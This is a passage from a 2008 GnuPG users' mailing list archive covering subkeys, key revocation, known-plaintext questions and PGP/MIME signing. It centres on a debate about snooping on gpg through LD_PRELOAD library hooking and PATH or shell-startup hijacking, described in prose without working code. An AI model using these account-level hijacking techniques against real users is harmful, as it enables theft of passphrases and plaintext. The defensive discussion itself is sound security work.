spykes.id.au Wed Jun 11 00:38:47 2008 From: sdwyer at spykes.id.au (Simon Dwyer) Date: Wed, 11 Jun 2008 08:38:47 +1000 Subject: Confused about Sub keys. In-Reply-To: <484E42F5.9010701@mac.com> References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> <484E42F5.9010701@mac.com> Message-ID: <1213137527.9874.2.camel@tsg001.mulawa.internal> Yes i made a bit of a mess when first setting up my account. The two revoked keys are ones i got confused with and wanted to start from scratch. The one that isnt revoked is my good key that i am using now. 9DA5B32F is my key that i will be using from now on. Thanks for the reply guys, Simon Dwyer On Tue, 2008-06-10 at 05:01 -0400, Charly Avital wrote: > Faramir wrote the following on 6/10/08 12:17 AM: > [...] > > > And that is the > > reason to use "key pairs", because a singe key can't do both functions. > > The above statement is not accurate. > > A careful reading of is > recommended. > > This is the Spanish version: > > Attention Simon Dwyer. The following keys were found on a key server: > (1) Simon Luke Dwyer > Simon Luke Dwyer (Technology Services Group) > 1024 bit DSA key 9DA5B32F, created: 2008-06-09 > (2) Simon Dwyer (SpYkEs) > 1024 bit DSA key 9D826360, created: 2008-06-09 (revoked) > (3) Simon Luke Dwyer (SpYkEs) > 1024 bit DSA key 41494BDE, created: 2008-06-06 (revoked) > Can you please confirm that key No. 1 '1024 bit DSA key 9DA5B32F, > created: 2008-06-09' is the one you are or will be using, since the > other two have been revoked. Thanks in advance. > > Charly > > > > [...] > > > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part URL: From bahamutzero8825 at gmail.com Wed Jun 11 02:32:16 2008 From: bahamutzero8825 at gmail.com (Andrew Berg) Date: Wed, 11 Jun 2008 00:32:16 +0000 Subject: One Time Password and GnuPG In-Reply-To: <484CB4FB.4000600@tx.rr.com> References: <484B0D40.9090307@sixdemonbag.org> <484C1543.8090604@gmail.com> <484CB4FB.4000600@tx.rr.com> Message-ID: <484F1D10.5090004@gmail.com> John Clizbe wrote: > Andrew Berg wrote: >> Bricks can be hallowed out. :P > > HOLY BRICKBATS, BATMAN!!!!! > > Would such bricks then be filled with the Holy Spirit to give them strength? > > I must assume you meant 'hollowed'. Yes I did. Of course, little plastic angel-like wings could be added for effect after being /hollowed/ out. -- Key ID: 0xF88E034060A78FCB Fingerprint: 4A84 CAE2 A0D3 2AEB 71F6 07FD F88E 0340 60A7 8FCB Sony PlayStation 3 (64-bit PowerPC compatible architecture) | Video mode: 480i (576x480) | Ubuntu 7.10 | Linux 2.6.24 | GPG 1.4.9/2.0.9 | Thunderbird 2.0.0.14 | Enigmail not installed From rjh at sixdemonbag.org Wed Jun 11 03:24:25 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Tue, 10 Jun 2008 20:24:25 -0500 Subject: One Time Password and GnuPG In-Reply-To: <484F1D10.5090004@gmail.com> References: <484B0D40.9090307@sixdemonbag.org> <484C1543.8090604@gmail.com> <484CB4FB.4000600@tx.rr.com> <484F1D10.5090004@gmail.com> Message-ID: <484F2949.5000306@sixdemonbag.org> Andrew Berg wrote: > Yes I did. Of course, little plastic angel-like wings could be added > for effect after being /hollowed/ out. Having not seen John's original message come through on GnuPG-Users, I can only assume that you are taking public something that he sent off-list, presumably for good reason. Please do not do this. It's rude. From bahamutzero8825 at gmail.com Wed Jun 11 04:16:00 2008 From: bahamutzero8825 at gmail.com (Andrew Berg) Date: Wed, 11 Jun 2008 02:16:00 +0000 Subject: One Time Password and GnuPG (OT tangent) In-Reply-To: <484F2949.5000306@sixdemonbag.org> References: <484B0D40.9090307@sixdemonbag.org> <484C1543.8090604@gmail.com> <484CB4FB.4000600@tx.rr.com> <484F1D10.5090004@gmail.com> <484F2949.5000306@sixdemonbag.org> Message-ID: <484F3560.4020202@gmail.com> Robert J. Hansen wrote: > Having not seen John's original message come through on GnuPG-Users, I > can only assume that you are taking public something that he sent > off-list, presumably for good reason. > > Please do not do this. It's rude. I don't do this intentionally. That message was threaded (by Thunderbird) with the rest of the discussion. Plus, the resolution is so low on my monitor (not by choice, but by capability) that header info is not displayed properly (it is possible to display this info, but doing so covers what little space there is to read a message). I'm not trying to make excuses, but that's just how it is. I will pay attention to OT messages more. I see that your message had a carbon copy to the list, so I would assume a reply to the list would be fine. From japnews at gmx.de Wed Jun 11 04:05:21 2008 From: japnews at gmx.de (Jan Jansen) Date: Wed, 11 Jun 2008 04:05:21 +0200 Subject: known-plaintext attacks Message-ID: <484F32E1.9000600@gmx.de> Hi, 1. Is the AES-Encryption of a file by gnupg vulnerable to known-plaintext attacks ? 2. Does this depend on the lenght of the plaintext ? 2.1 Is a strong Passphrase even safe, if the size of the known plaintext is just 1 Byte or even 10 GB ? 3. Is it possible for sombody, who does not know the strong Passphrase, to guess reliably, if the encrypted data contains a known file ? 4. Why or Why not (1.,2.,3 )? Thanks. JJ From shavital at mac.com Wed Jun 11 05:22:04 2008 From: shavital at mac.com (Charly Avital) Date: Tue, 10 Jun 2008 23:22:04 -0400 Subject: Confused about Sub keys. In-Reply-To: <1213137527.9874.2.camel@tsg001.mulawa.internal> References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> <484E42F5.9010701@mac.com> <1213137527.9874.2.camel@tsg001.mulawa.internal> Message-ID: <484F44DC.3010908@mac.com> Simon Dwyer wrote the following on 6/10/08 6:38 PM: > Yes i made a bit of a mess when first setting up my account. The two > revoked keys are ones i got confused with and wanted to start from > scratch. The one that isnt revoked is my good key that i am using now. > > 9DA5B32F is my key that i will be using from now on. > > Thanks for the reply guys, > > Simon Dwyer Thank you for your answer. OpenPGP Security Info Good signature from Simon Luke Dwyer Key ID: 0x9DA5B32F / Signed on: 6/10/08 6:38 PM Key fingerprint: 6720 2B88 B588 2A2A D314 0863 B79E 09D5 9DA5 B32F Charly From dshaw at jabberwocky.com Wed Jun 11 05:24:15 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Tue, 10 Jun 2008 23:24:15 -0400 Subject: known-plaintext attacks In-Reply-To: <484F32E1.9000600@gmx.de> References: <484F32E1.9000600@gmx.de> Message-ID: <5CE20ED4-98FF-43F3-9CD0-4089E62FF6D1@jabberwocky.com> On Jun 10, 2008, at 10:05 PM, Jan Jansen wrote: > Hi, > > 1. Is the AES-Encryption of a file by gnupg vulnerable to known- > plaintext attacks ? No. > 2. Does this depend on the lenght of the plaintext ? No. > 2.1 Is a strong Passphrase even safe, if the size of the known > plaintext is just 1 Byte or even 10 GB ? Yes. > 3. Is it possible for sombody, who does not know the strong > Passphrase, to guess reliably, if the encrypted data contains a > known file ? Cannot be answered in the context of this question. It depends on the cipher mode. > 4. Why or Why not (1.,2.,3 )? http://en.wikipedia.org/wiki/Advanced_Encryption_Standard#Security David From michael.graffam at gmail.com Wed Jun 11 16:43:02 2008 From: michael.graffam at gmail.com (michael graffam) Date: Wed, 11 Jun 2008 10:43:02 -0400 Subject: LD_PRELOAD attack Message-ID: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> Has anyone read the article in the most recent 2600 regarding using LD_PRELOAD to eavesdrop on gnupg? I realize that the actual recovery of a passphrase by this means is no better than keylogger -- But what concerns me more (and isn't explicitely covered in the article) is the ability to inject false randomness into GPG key generation, or even change the plaintext going in. I think the advice to statically link a strcmp and getenv into GPG for purposes of checking/scrubbing the environment is a good one. Sure - you have to trust the machine you're running on - but it seems to me that a basic sanity check would be in order. Thoughts? -M -- Sent from Gmail for mobile | mobile.google.com From yalla at fsfe.org Wed Jun 11 18:02:13 2008 From: yalla at fsfe.org (Alexander W. Janssen) Date: Wed, 11 Jun 2008 18:02:13 +0200 Subject: LD_PRELOAD attack In-Reply-To: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> Message-ID: <484FF705.2050405@fsfe.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 michael graffam schrieb: > Thoughts? Run "unset LD_PRELOAD" before running gnupg if you don't trust the system? It's an inherent feature of the loader. Compiling everthing statically only works around this inherent feature/problem, however you call it. And it wouldn't prevent any other keyloggers or flaws in drivers. Just my 2c though. > -M Alex. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQCVAwUBSE/3AxYlVVSQ3uFxAQJDywQAuFndAr3Woy5cEzZr8rU3kUz5ITHiKcRI Vul18f+/qCYTnGnl6ipudePe3b0qycF83LxMvDO7sH9jQOud9vViLKAygqx77dBv tgowk3H37gd/91QkZCfpLV05Im60sCX+d+4a9FDzKF8vcsA8ac1EIVUbbUOsftBv VDrNMn6nTjo= =64mR -----END PGP SIGNATURE----- From rjh at sixdemonbag.org Wed Jun 11 19:00:09 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Wed, 11 Jun 2008 12:00:09 -0500 Subject: LD_PRELOAD attack In-Reply-To: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> Message-ID: <48500499.5020408@sixdemonbag.org> michael graffam wrote: > Has anyone read the article in the most recent 2600 regarding using > LD_PRELOAD to eavesdrop on gnupg? My reaction to it has been to yawn. If you don't have physical security on your machine, you don't have any electronic security worth talking about. We've known this for decades now. This is just another example of what happens when people think they can have electronic security without physical control over the hardware. From michael.graffam at gmail.com Wed Jun 11 18:58:48 2008 From: michael.graffam at gmail.com (michael graffam) Date: Wed, 11 Jun 2008 12:58:48 -0400 Subject: LD_PRELOAD attack In-Reply-To: <484FF705.2050405@fsfe.org> References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <484FF705.2050405@fsfe.org> Message-ID: <3e86b22c0806110958p4f2a1faq7f618e9d6f69d7e2@mail.gmail.com> Not a real solution, because if LD_PRELOAD is already set, then the shell you type unset into might be overloaded as we'll, already. You can't trust strcmp() or getenv() either, since the preloaded lib could be hooking them on you. I've was able to write a stealthed lib which successfully hides itself from calls to getenv, and ignore attempts to unset env vars. Manually walking the environment pointer reveals it, of course. On 6/11/08, Alexander W. Janssen wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > michael graffam schrieb: >> Thoughts? > > Run "unset LD_PRELOAD" before running gnupg if you don't trust the system? > > It's an inherent feature of the loader. Compiling everthing statically > only works around this inherent feature/problem, however you call it. > And it wouldn't prevent any other keyloggers or flaws in drivers. > > Just my 2c though. > >> -M > > Alex. > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > > iQCVAwUBSE/3AxYlVVSQ3uFxAQJDywQAuFndAr3Woy5cEzZr8rU3kUz5ITHiKcRI > Vul18f+/qCYTnGnl6ipudePe3b0qycF83LxMvDO7sH9jQOud9vViLKAygqx77dBv > tgowk3H37gd/91QkZCfpLV05Im60sCX+d+4a9FDzKF8vcsA8ac1EIVUbbUOsftBv > VDrNMn6nTjo= > =64mR > -----END PGP SIGNATURE----- > > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users > -- Sent from Gmail for mobile | mobile.google.com From yalla at fsfe.org Wed Jun 11 19:05:22 2008 From: yalla at fsfe.org (Alexander W. Janssen) Date: Wed, 11 Jun 2008 19:05:22 +0200 Subject: LD_PRELOAD attack In-Reply-To: <3e86b22c0806110958p4f2a1faq7f618e9d6f69d7e2@mail.gmail.com> References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <484FF705.2050405@fsfe.org> <3e86b22c0806110958p4f2a1faq7f618e9d6f69d7e2@mail.gmail.com> Message-ID: <485005D2.7070205@fsfe.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 michael graffam schrieb: > Not a real solution, because if LD_PRELOAD is already set, then the > shell you type unset into might be overloaded as we'll, already. Now that's very true; but still my opinion is that if you can't trust the system on which you're working, I wouldn't dare to use gnupg anyway. Sure, you could link everything statically to gnupg, but that'd make maintenance very very hard. For every revision of a dependant lib you'd need adapt code, ship new source, recompile or ship new binaries. Dependancy-hell. Though a smartcard might help there... > Manually walking the environment pointer reveals it, of course. Not exactly sure what you mean there? Alex. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQCVAwUBSFAF0BYlVVSQ3uFxAQJslwP7BF16iyonCXhxH6bLseATu/j54LXrgOtB ruBkamEHCdZUVTeXiq5W9SsFOEAbuXaEgtmV/mRsvtOM1doT9syQqx8+Y75BLja9 KFs++aDIx0mx6l01oacxTk8lJf59p9KiFvB+a6TQcWbbMnX1GCCkxj4u9OrByk+A BHGGI3tb9Q4= =RMFQ -----END PGP SIGNATURE----- From Dionysios.Sartoros at SPVM.QC.CA Wed Jun 11 19:13:05 2008 From: Dionysios.Sartoros at SPVM.QC.CA (Sartoros Dionysios) Date: Wed, 11 Jun 2008 13:13:05 -0400 Subject: Encrypting files for many users.. Message-ID: Hey, Question for you guys, new gnupg user here, great software.. I was thinking of maybe encrypting files in PGP that many people will require access to, since i dont know PGP inside and out I was wondering what would be the best method, as sometimes I will have to remove access for some users and add new users I dont know subkeys or how pgp works with files too well.. Can i add/remove users' keys to encrypted files.. If i have 100 or even 1000 files, would I have to do it one by one (to add a new user or remove access to one).. Thanks Dennis From michael.graffam at gmail.com Wed Jun 11 20:03:47 2008 From: michael.graffam at gmail.com (michael graffam) Date: Wed, 11 Jun 2008 14:03:47 -0400 Subject: LD_PRELOAD attack In-Reply-To: <48500499.5020408@sixdemonbag.org> References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <48500499.5020408@sixdemonbag.org> Message-ID: <3e86b22c0806111103g58fafb0bj99cfe26fa67295b5@mail.gmail.com> How does "physical security" have anything to do with env vars? I'm not asking for gnupg programmers to try and thwart hardware keyloggers. But just like we ask our software to do the Right Thing with respect to say, defeating buffer overflows, it would be nice to do the Right Thing and check environment sanity. -M On 6/11/08, Robert J. Hansen wrote: > michael graffam wrote: >> Has anyone read the article in the most recent 2600 regarding using >> LD_PRELOAD to eavesdrop on gnupg? > > My reaction to it has been to yawn. > > If you don't have physical security on your machine, you don't have any > electronic security worth talking about. We've known this for decades > now. This is just another example of what happens when people think > they can have electronic security without physical control over the > hardware. > > > -- Sent from Gmail for mobile | mobile.google.com From faramir.cl at gmail.com Wed Jun 11 20:34:52 2008 From: faramir.cl at gmail.com (Faramir) Date: Wed, 11 Jun 2008 14:34:52 -0400 Subject: Confused about Sub keys. In-Reply-To: <484EBCB9.4050805@chud.net> References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> <484EBCB9.4050805@chud.net> Message-ID: <48501ACC.9060907@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Chris De Young escribi?: >> it must be defined at the moment of creating the key. And that is the >> reason to use "key pairs", because a singe key can't do both functions. > > "Key pair" in most contexts actually refers to the set of > public key + private key, not to key + subkey(s) -- at least that seems > to be the common usage from what I've seen. > > Cheers, > -C To think I actually had a matter named "security of information", and I learned about the meaning of "key pair", just to forget it 6 months latter... I feel ashamed... -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIUBrMAAoJEMV4f6PvczxA31IH/jFL0Wk04duwKTfSB6KqOcxq Pc9iqNcQ3pENwgCKLiQcs0k63juv7whHEBcxAdnMo1tsVQpq3Df5B12inW1FFnFB G7E08ry+8R6QebeQWSJgXhmBnThmNwnMnO7FyEv7fx3JgoMScTqvFMmXGM9pu2Ps p2iAjPSwy+U+56qNs2a51zpYzGuq/mQwe1QPSUPNTgEd2+uQOzroms+iYgdIlX8Y NvPOkW9RL2VWT1Tw5/9BdnnjrrjthBnHx3zCIKXybBs+BM6OaLdiNSD8jLZPfVan j40S62+u3pceDge6Icfk8nWuiJM9K7D4m7XEJnw0KvvX120vtiye2wDRW9LszUw= =xNNR -----END PGP SIGNATURE----- From yalla at fsfe.org Wed Jun 11 21:37:15 2008 From: yalla at fsfe.org (Alexander W. Janssen) Date: Wed, 11 Jun 2008 21:37:15 +0200 Subject: LD_PRELOAD attack In-Reply-To: <3e86b22c0806110958p4f2a1faq7f618e9d6f69d7e2@mail.gmail.com> References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <484FF705.2050405@fsfe.org> <3e86b22c0806110958p4f2a1faq7f618e9d6f69d7e2@mail.gmail.com> Message-ID: <4850296B.3020707@fsfe.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 michael graffam schrieb: > Not a real solution, because if LD_PRELOAD is already set, then the > shell you type unset into might be overloaded as we'll, already. OK, that was new to me. I checked it with some simple tests [1] and you're absolutely right. Unsetting doesn't help. > Manually walking the environment pointer reveals it, of course. Still not sure, what you're meaning? But still: The LD_PRELOAD-thing is so fundamental - if you are not in control of your running shell, you have a problem anyway. I don't think it's up to gnupg to solve that problem. It can't even - except static linking with puts you straight into dependency-hell. Alex. [1] - some simple LD_PRELOAD tests: https://pastebin.ynfonatic.de/152 > On 6/11/08, Alexander W. Janssen wrote: > michael graffam schrieb: >>>> Thoughts? > Run "unset LD_PRELOAD" before running gnupg if you don't trust the system? > > It's an inherent feature of the loader. Compiling everthing statically > only works around this inherent feature/problem, however you call it. > And it wouldn't prevent any other keyloggers or flaws in drivers. > > Just my 2c though. > >>>> -M > Alex. > >> _______________________________________________ Gnupg-users mailing list Gnupg-users at gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users >> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQCVAwUBSFApaRYlVVSQ3uFxAQKnegP+M3XVbameZXPcP1eL/3IaPoGcSLU3tzzT Apq5C3emiE1trRzFDsTOkUr6XtgYeF2Y3TTwQZE8yYh9eV4YCs99xtG16ucFq09I h0aYMT7+HWiyUah/aSo6OqHTiRPABlJGwS13vk6J9hEnj67OH/2EWVGQQfsrlz/m yS9jgsJ1Gcw= =IiKv -----END PGP SIGNATURE----- From dshaw at jabberwocky.com Wed Jun 11 21:56:27 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Wed, 11 Jun 2008 15:56:27 -0400 Subject: LD_PRELOAD attack In-Reply-To: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> Message-ID: <20080611195627.GA4876@jabberwocky.com> On Wed, Jun 11, 2008 at 10:43:02AM -0400, michael graffam wrote: > Has anyone read the article in the most recent 2600 regarding using > LD_PRELOAD to eavesdrop on gnupg? I read the article. For those who didn't see it, the basic summary is that by using LD_PRELOAD to replace various functions (memcpy and read) underneath a given execution of GPG, you can snoop on what is going on. > But what concerns me more (and isn't explicitely covered in the > article) is the ability to inject false randomness into GPG key > generation, or even change the plaintext going in. > > I think the advice to statically link a strcmp and getenv into GPG for > purposes of checking/scrubbing the environment is a good one. I don't. The idea of using LD_PRELOAD to play various security games is not a new one. It's fun to play around with and handy for debugging, but it's not a useful attack in the real world. If the attacker had access to your machine to implement the LD_PRELOAD attack, there are literally dozens of ways they can similarly steal whatever data they are trying to steal. Why do a very complex attack involving replacing libraries when they could just replace the GPG binary itself? Or add a shell script named 'gpg' and put it in your search path ahead of the real gpg? Or turn on typescript by default. Or load a kernel module that changes the meaning of system calls. Or replace the rng with one that isn't random. Or, or, or. If you don't have control of your computer, you don't have control of your computer full stop. Having GPG do some extra checks doesn't really help, because the attacker can simply arrange for these extra checks to appear to succeed, or just replace GPG altogether so they don't run. If I may torture an analogy here, being worried about someone who has access to your computer using LD_PRELOAD to attack you is like being worried that a burglar has a key to your front door... but your front door isn't locked anyway. David From rick at rickv.com Wed Jun 11 21:38:17 2008 From: rick at rickv.com (Rick Valenzuela) Date: Wed, 11 Jun 2008 15:38:17 -0400 Subject: public key different between keyserver and exported file Message-ID: <485029A9.8010106@rickv.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 I just created a new primary key and subkeys, and uploaded them to keyservers. Then I exported my public key in ascii-armor, and copied that file to my website. I noticed that the very last few characters were different from what the keyservers had. Each version begins the same, but somewhere they end up different. Did I mess something up? Should I be worried about this? You can compare the two here: At the top of this link is my uploaded public key: http://keyserver.gingerbear.net:11371/pks/lookup?search=rick+valenzuela&fingerprint=on&op=index (It is also different at pgp.mit.edu, and at http://sks-keyservers.net/status) The public key as I exported it from the command line is here: http://www.rickv.com/publickey.txt Any help would be appreciated. Best, Rick - -- Rick Valenzuela photographer | reporter +1 267 694 3642 | www.rickv.com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iF4EAREKAAYFAkhQKakACgkQhHTA8gi5MvCfzwD/SIdpjCBfHkTHI5pEa7xZ2Yhi zt7yHa7LklKg0L4SvBYA/j8cFAtG4Fe1g7AoyCWhnQHlb9kCb8Fwsc+FiwmmhmOk =UQUz -----END PGP SIGNATURE----- From rick at rickv.com Wed Jun 11 21:41:05 2008 From: rick at rickv.com (Rick Valenzuela) Date: Wed, 11 Jun 2008 15:41:05 -0400 Subject: passphrases: the police and subkeys scenario Message-ID: <48502A51.5030804@rickv.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 I'm now confused about creating a separate subkey for encrypting, as opposed to creating one keypair that signs and encrypts. The example I've seen around is that if you're set up the subkey way and the police demand the private part of your key, you don't have to sacrifice your primary key, which carries all your signatures. (I hope I said that correctly.) Well, I understood that as meaning I would have separate passphrases for the subkey and the primary key: Apparently, that's not possible. So then how would this police scenario play out? If supposing then that TSA or some entity forces me to give up my passphrase for decryption purposes, then I've compromised everything, no? Trying and thinking, Rick - -- Rick Valenzuela photographer | reporter +1 267 694 3642 | www.rickv.com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iF4EAREKAAYFAkhQKlEACgkQhHTA8gi5MvCbMAD9GbVMeiUlFBA6g6Nn7FadCGTs tPCgQsg0qAmZd1tXjWgA/RE+S2rvXFfby54eYBLC8cTG6RwyP9Se47yVfOfGPaK2 =li/V -----END PGP SIGNATURE----- From lopaki at gmail.com Wed Jun 11 22:24:47 2008 From: lopaki at gmail.com (Scott Lambdin) Date: Wed, 11 Jun 2008 16:24:47 -0400 Subject: Confused about Sub keys. In-Reply-To: <1213062867.12670.11.camel@tsg001.mulawa.internal> References: <1213062867.12670.11.camel@tsg001.mulawa.internal> Message-ID: <529e76830806111324y244a4567k6dad886af334961f@mail.gmail.com> Good example of why you need subkeys. http://www.wsbtv.com/news/15847652/detail.html On 6/9/08, Simon Dwyer wrote: > > Hi everyone, > > I am new to all this and have been alot of reading. > > One thing i cant get my head around is subkeys. I have generated a sub > key with my master key and i undestand that. All the commands and thing > i have been doing i have been using my master keys id... should i be > actively using my sub key? or does it just use it as i talk to people? > > Cheers, > > Simon Dwyer > > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users > > > -- CILCIL -------------- next part -------------- An HTML attachment was scrubbed... URL: From michael.graffam at gmail.com Wed Jun 11 22:31:45 2008 From: michael.graffam at gmail.com (michael graffam) Date: Wed, 11 Jun 2008 16:31:45 -0400 Subject: LD_PRELOAD attack In-Reply-To: <20080611195627.GA4876@jabberwocky.com> References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <20080611195627.GA4876@jabberwocky.com> Message-ID: <3e86b22c0806111331y442910a2i5cf4078b140c8e07@mail.gmail.com> On Wed, Jun 11, 2008 at 3:56 PM, David Shaw wrote: > If the attacker had access to your machine to implement the LD_PRELOAD > attack, there are literally dozens of ways they can similarly steal > whatever data they are trying to steal. Why do a very complex attack > involving replacing libraries when they could just replace the GPG > binary itself? Replacing the GPG bin requires root. An LD_PRELOAD'ed lib doesn't. Or add a shell script named 'gpg' and put it in your > search path ahead of the real gpg? Again, root. > Or turn on typescript by default. Doesn't save GPG passphrases. > > Or load a kernel module that changes the meaning of system calls. Or > replace the rng with one that isn't random. Or, or, or. Root, root, root. Get it yet? LD_PRELOAD enables attacks against GPG w/o requiring full access to the box. The attacker just need access to the user's account. If you don't have control of your computer, you don't have control of > your computer full stop. By that logic, anti-lock brakes are useless because, well.. clearly.. if you don't have control over your car, then you don't have control over your car. In point of fact, it is precisely when you have lost control of your car, that you need anti-lock brakes. I think the same applies here. > Having GPG do some extra checks doesn't > really help, because the attacker can simply arrange for these extra > checks to appear to succeed, or just replace GPG altogether so they > don't run. So, you write static-strcmp(), throw it into the code, and in main() you use static-strcmp() to walk the environment pointer. If you find an LD_PRELOAD, you bail. I am not aware of any way to fake these checks w/o modifying the bin (root!). If I may torture an analogy here, being worried about someone who has > access to your computer using LD_PRELOAD to attack you is like being > worried that a burglar has a key to your front door... but your front > door isn't locked anyway. I don't think this situation is analogous at all, in fact. I think it is more like saying: why be worried about someone having a key to your front door when they can just blow the door apart with a shotgun. Sure, its true.. and if your threat model includes shotgun-carrying assailants or hostile root users, its entirely valid. But what about just some basic hygiene to keep honest people honest? Hell, thats what most REAL locks are for, anyhow. -M -------------- next part -------------- An HTML attachment was scrubbed... URL: From deron.meranda at gmail.com Wed Jun 11 21:46:51 2008 From: deron.meranda at gmail.com (Deron Meranda) Date: Wed, 11 Jun 2008 15:46:51 -0400 Subject: Signing in RFC3156 PGP/MIME format Message-ID: <5c06fa770806111246u678913fatf7af38a3d55a87ae@mail.gmail.com> I can not seem to figure out how to use gpg2 to create signatures in RFC3156 PGP/MIME format; rather than the inline OpenPGP format. I'm prepared to do all the necessary MIME encapsulation and canonicalization of the first part of the multiple/signed component, but then want to use gpg to produce the signature which would go into the second part, the application/pgp-signature. First, some clarification would be helpful for those who know: the RFC3156 seems to indicate that the signature's armor-header should be "BEGIN PGP MESSAGE", but then the newer RFC 4880 appears to update this so that "BEGIN PGP SIGNATURE" is to be used instead. Is this a correct interpretation, and/or does it matter? If there is no direct support or option I haven't found to produce RFC3156 output, what I think might work would be to create the first mime component (complete with the Content-Type and Content-Transfer-Encoding headers) and put it into a file, and then sign that using: gpg2 --rfc4880 --armor --sign testdoc.part Omitting the -t (text) option, because I've already done the canonical line ending conversion, if needed (It could even contain binary attachments, etc., but I would handle all that). Then I get the *.asc file, which at the end contains a "BEGIN PGP SIGNATURE" armor-encoded signature block. Is that the same thing I would then need to put into the application/pgp-signature mime part? And is there a way to get just that signature block out of gpg without it also including the whole message inlined above it? Thanks -- Deron Meranda From roam at ringlet.net Wed Jun 11 22:55:18 2008 From: roam at ringlet.net (Peter Pentchev) Date: Wed, 11 Jun 2008 23:55:18 +0300 Subject: LD_PRELOAD attack In-Reply-To: <3e86b22c0806111331y442910a2i5cf4078b140c8e07@mail.gmail.com> References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <20080611195627.GA4876@jabberwocky.com> <3e86b22c0806111331y442910a2i5cf4078b140c8e07@mail.gmail.com> Message-ID: <20080611205518.GA1172@straylight.m.ringlet.net> On Wed, Jun 11, 2008 at 04:31:45PM -0400, michael graffam wrote: > On Wed, Jun 11, 2008 at 3:56 PM, David Shaw wrote: > > > If the attacker had access to your machine to implement the LD_PRELOAD > > attack, there are literally dozens of ways they can similarly steal > > whatever data they are trying to steal. Why do a very complex attack > > involving replacing libraries when they could just replace the GPG > > binary itself? > > Replacing the GPG bin requires root. An LD_PRELOAD'ed lib doesn't. > > > Or add a shell script named 'gpg' and put it in your > > search path ahead of the real gpg? > > Again, root. Nope. None of these is true. If an attacker has access to *your* account, he has perfectly good access to your shell startup files, and he is perfectly capable of changing your PATH to include a directory of his choosing where he may place any binaries he wants to - and your shell will happily execute them instead of the real system binaries. Or maybe you are in the habit of auditing your .*shrc and .*sh_profile files after each and every login? And then auditing the pager or editor that you audited them with? If so, my hat's off to you, Sir, but this is a level of paranoia that I'm not quire comfortable with :) > > Or turn on typescript by default. > > Doesn't save GPG passphrases. True. > > Or load a kernel module that changes the meaning of system calls. Or > > replace the rng with one that isn't random. Or, or, or. > > > Root, root, root. This, too, is true. > Get it yet? LD_PRELOAD enables attacks against GPG w/o requiring full access > to the box. The attacker just need access to the user's account. True, too, except that an attacker with access to your account really does have at least seven ways (that pop up in my mind without even thinking too hard) of replacing the gpg or pinentry or whatever binaries without you noticing *at once*. G'luck, Peter -- Peter Pentchev roam at ringlet.net roam at cnsys.bg roam at FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 I am the thought you are now thinking. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 195 bytes Desc: not available URL: From yalla at fsfe.org Wed Jun 11 23:30:47 2008 From: yalla at fsfe.org (Alexander W. Janssen) Date: Wed, 11 Jun 2008 23:30:47 +0200 Subject: LD_PRELOAD attack Message-ID: <48504407.10405@fsfe.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 (forwarded this message) michael graffam schrieb: > It's easy to solve the problem: all you need is a trusted strcmp() (i.e > one linked directly w/ main() ).. > > Before you do anything else, main() checks the environment pointer with > the trusted strcmp() to make sure LD_PRELOAD isn't present. If it is, > bail with a message. Done. Interesting approach, but even if the variable LD_PRELOAD is empty or doesn't exist, the process running in a compromised shell still runs the preloaded-lib. Even if you have a trusted strcmp(), it 